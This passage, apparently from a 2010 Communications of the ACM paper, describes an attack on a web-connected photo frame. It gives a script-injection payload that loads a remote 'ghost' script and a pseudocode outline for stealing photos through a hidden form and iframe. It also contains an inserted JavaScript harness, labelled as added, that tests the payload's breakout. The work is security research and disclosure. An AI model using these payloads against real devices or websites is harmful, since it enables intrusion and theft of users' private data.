[Figure 9. The ghost in action: a photo has just been exfiltrated. Phase 1, infection: port scan, login CSRF, ghost injection. Phase 2, execution: inject payload, fetch data, post data.]
Execution: The four challenges we faced in implementing a
ghost designed to exfiltrate data were:
1. Payload size: the size of the payload that can be
injected is limited.
2. JavaScript errors: the code must not trigger a single
JavaScript error, otherwise the browser will stop the
execution, preventing the exfiltration.
3. Fetching data: we had to find a way to fetch binary
data. This is not supported directly by
XMLHttpRequest.
4. Exfiltrating data: once the data was loaded in memory,
we had to exfiltrate it while keeping the regular frame
code running.
110 Communications of the ACM | August 2010 | Vol. 53 | No. 8
The first challenge was addressed by using a loader: the
injected code is not the ghost itself but rather a short payload
that asks the browser to load the ghost as an external
JavaScript file.
The second challenge was more difficult because the
injected ghost is reflected in the middle of a JavaScript
function, as the value of the frame-name variable. Therefore
the following payload was injected as the frame name:
    name"; }</script>
    <script src="http://www/g.js">
    </script><script> function n() {var frameName = "
This payload is designed to close the string literal, the
function and the script, request the ghost as a new script and
then reopen the function. Resuming the function was required
because otherwise the frame's own control code, which follows
the injection point, would have been broken by a syntax error.
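The following is an added example, not code from the paper: it rebuilds the page as the photo frame would emit it once a frame name is reflected, unescaped, into its inline script, then checks that every resulting <script> block still parses. PAGE_TEMPLATE is an assumption about the vulnerable page's shape (the paper only says the name lands inside a string literal inside a function); the payload is the paper's, with quotes normalised to ASCII. It also shows why a naive breakout that does not reopen the function fails challenge 2.

```javascript
// Added example (not code from the paper). PAGE_TEMPLATE is an assumed shape
// for the vulnerable page: the frame name is reflected into a string literal
// inside a function, and more of the page's own code follows it.
const PAGE_TEMPLATE =
  '<script> function n() {var frameName = "__NAME__"; ' +
  'document.title = frameName; } </script>';

// The paper's payload, quotes normalised to ASCII. It closes the string,
// the function and the script, loads the ghost, then reopens a function
// so the page's own remaining code still parses.
const PAYLOAD =
  'name"; }</script>' +
  '<script src="http://www/g.js"></script>' +
  '<script> function n() {var frameName = "';

// A naive breakout that does not resume the function: the page's trailing
// code becomes an unterminated string and the browser stops executing.
const BROKEN_PAYLOAD = '"; }';

// Reflect the name the way the vulnerable frame does: no escaping at all.
// A function replacement avoids String.replace's $-pattern expansion.
function reflect(template, name) {
  return template.replace('__NAME__', () => name);
}

// Pull out <script ...>body</script> blocks the way the HTML parser will:
// the first </script> it meets ends the element, whatever JavaScript
// context it interrupts.
function extractScripts(html) {
  const re = /<script([^>]*)>([\s\S]*?)<\/script>/gi;
  const scripts = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    const src = /src="([^"]*)"/.exec(m[1]);
    scripts.push({ src: src ? src[1] : null, body: m[2] });
  }
  return scripts;
}

// Challenge 2 in the text: every inline script must compile, or the
// browser aborts and the ghost never runs.
function compiles(js) {
  try {
    new Function(js);
    return true;
  } catch (e) {
    return false;
  }
}

// Summarise what a given frame name does to the page: how many script
// blocks result, which external scripts get loaded, and whether every
// inline block still parses.
function analyse(name) {
  const scripts = extractScripts(reflect(PAGE_TEMPLATE, name));
  return {
    count: scripts.length,
    externalSrc: scripts.filter((s) => s.src !== null).map((s) => s.src),
    allInlineCompile: scripts
      .filter((s) => s.src === null)
      .every((s) => compiles(s.body)),
  };
}
```

Running analyse(PAYLOAD) yields three script blocks, one of them the external loader, with both inline blocks compiling; analyse(BROKEN_PAYLOAD) leaves a single block that no longer parses, which is exactly the failure the resumed function avoids.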
To deal with the third and fourth challenges, which
are closely related, we had to come up with a new
method that uses AJAX tricks and manipulates the
XMLHttpRequest object in a novel way. The sketch of the
code used as a ghost is depicted below:
    injectIFrame();
    redirectPost();
    data = fetch(page);
    data = decode(data);
    data = reencode(data);
    post(data);
    reload();
This code works as follows: first it injects into the page an
invisible form named f (used to post the exfiltrated data) and an
iframe named upload_target (line 1). This iframe takes advantage
of the ability to control through JavaScript the frame in which
the form f's action will be executed. Accordingly the second step
of the ghost (line 2) is to redirect the form f's action to our
invisible iframe with the following JavaScript command:
document.f.target = 'upload_target';. Posting into the iframe is
mandatory to prevent a redirection of the entire page, which
would break the exfiltration loop and alert the user. Note that
the same origin policy, the mechanism which protects the user's
session to a legitimate Web site from being exploited by a
different, malicious Web site [11], is not an issue here, as
posting data from the legitimate site to the malicious one goes
in the opposite direction and is currently fully unrestricted: